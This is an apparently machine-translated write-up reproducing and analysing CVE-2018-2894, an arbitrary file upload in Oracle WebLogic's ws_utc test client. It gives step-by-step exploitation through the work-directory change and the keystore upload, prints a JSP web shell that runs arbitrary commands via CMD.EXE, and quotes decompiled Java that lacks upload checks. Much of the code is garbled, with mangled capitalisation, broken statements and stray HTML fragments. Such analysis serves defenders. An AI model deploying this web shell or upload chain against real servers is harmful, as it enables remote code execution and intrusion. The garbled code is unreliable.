WebLogic arbitrary file Upload Vulnerability recurrence and analysis-"cve-2018-2894"

cve-2018-2894

Vulnerability Impact version: 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3

: Http://download.oracle.com/otn/nt/middleware/12c/12213/fmw_12.2.1.3.0_wls_quick_Disk1_1of1.zip

Vulnerability replication

After the service starts, Access http://localhost:7001/ws_utc/config.do

You can change the current working directory to a different directory. The local environment, for example, can be deployed to the C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.ws-testclient-app-wls\4mcj4y\war next

Select the right 安全 column to add the JKS Keystores upload file. Assume the chybeta.jsp following:

<%@PageImport="Java.util.*,java.io.*,java.net.*"%><HTML><BODY><formMethod="POST"Name="MyForm"action=""><inputType="Text"Name="CMD"><inputType="Submit"Value="Send"></FORM><pre><%If(Request.GetParameter("CMD")!=Null){Out.println("Command:"+Request.GetParameter("CMD")+"\n<br>");ProcessP=Runtime.GetRuntime().Exec("CMD.EXE/C"+Request.GetParameter("CMD"));OutputStreamOs=P.Getoutputstream();InputStreamInch=P.getInputStream();DataInputStreamDis=Newdatainputstream (instring disr = dis. Readline (); while  (disr != null ) {out. Println (disrdisr = dis. Readline (); } }%></pre></BODY >              

The capture packet gets to the timestamp 1531987145013 , then the uploaded position isconfig\keystore\1531987145013_chybeta.jsp

Accesshttp://localhost:7001/ws_utc/config/keystore/1531987145013_chybeta.jsp

Brief vulnerability Analysis

In ws-testpage-impl.jar!/com/oracle/webservices/testclient/setting/TestClientWorkDirManager.class:59 :

PublicvoidChangeworkdir(StringPath){String[]Oldpaths=This.Getrelatedpaths();If(This.Testpageprovider.Getwsimpltype()==Impltype.JRF){This.Isworkdirchangeable=False;This.Isworkdirwritable=Isdirwritable(Path);This.Isworkdirchangeable=True;This.Settestclientworkdir(Path);}Else{This.Persistworkdir(Path);This.Init();}if  (this. Isworkdirwritable) {string[]  Newpaths = this. (); movedirs (oldpathsnewpaths< Span class= "O" >); } else {logger. Fine ( "[INFO] newly specified testclient working Dir is readonly. Won ' t move the configuration stuff to new path. " }             /span>                

This function is used to change the working directory, but it does not do any testing.

In the ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/res/SettingResource.class:181 :

@Path("/keystore")@POST@Produces({"Application/xml","Application/json"})@Consumes({"Multipart/form-data"})PublicResponseEditkeystoresettingbymultipart(FormdatamultipartFormpartparams){If(!Requestutil.Isrequstedbyadmin(This.Request)){ReturnResponse.Status(Status.FORBIDDEN).Build();}Else{If(Testclientrt.Isverbose()){Logger.Fine("Calling Settingresource.addkeystoresettingbymultipart");}StringCurrenttimevalue=""+  (new date ()).  (); keyvaluesmap<stringString< Span class= "o" >> formparams = rsdatahelper.< Span class= "NA" >getinstance ().  (formpartparamstrue< Span class= "O", testclientrt. (), currenttimevalue} }             /span>                

Follow inws-testpage-impl.jar!/com/oracle/webservices/testclient/core/ws/cdf/config/parameter/TestClientRT.class:31

GetkeystorepathgetconfigdirFile." KeyStore "}    

Gets the path to write storePath .

In ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/util/RSDataHelper.class:145 :

PublicKeyvaluesmap<String,String>Convertformdatamultipart(FormdatamultipartFormpartparams,BooleanIsextactattachment,StringPath,StringFilenameprefix){...If(Attachname!=Null&&Attachname.Trim().Length()>0){If(Attachname!=Null&&Attachname.Trim().Length()!=0){Attachname=This.Refactorattachname(Attachname);If(Filenameprefix==Null){Filenameprefix=Key;}StringFileName=(NewFile(Storepath,Filenameprefix+"_"+Attachname)).GetAbsolutePath (); kvmap. (keyfilenameif  (isextactattachment{this. (filename () bodypart. (inputstream. Class} } }  ...               /span>                

Upload the contents of the file into the storePath directory, the file name is satisfied fileNamePrefix + "_" + attachName . This process does not have any filtering and checking:) ...

Conditions:

• Need to know the Web directory where your app is deployed
• ws_utc/config.doCertification is not required in development mode and requires certification in production mode. See Oracle for specific visibility? Fusion Middleware administering Web Services

WebLogic arbitrary file Upload Vulnerability recurrence and analysis-"cve-2018-2894"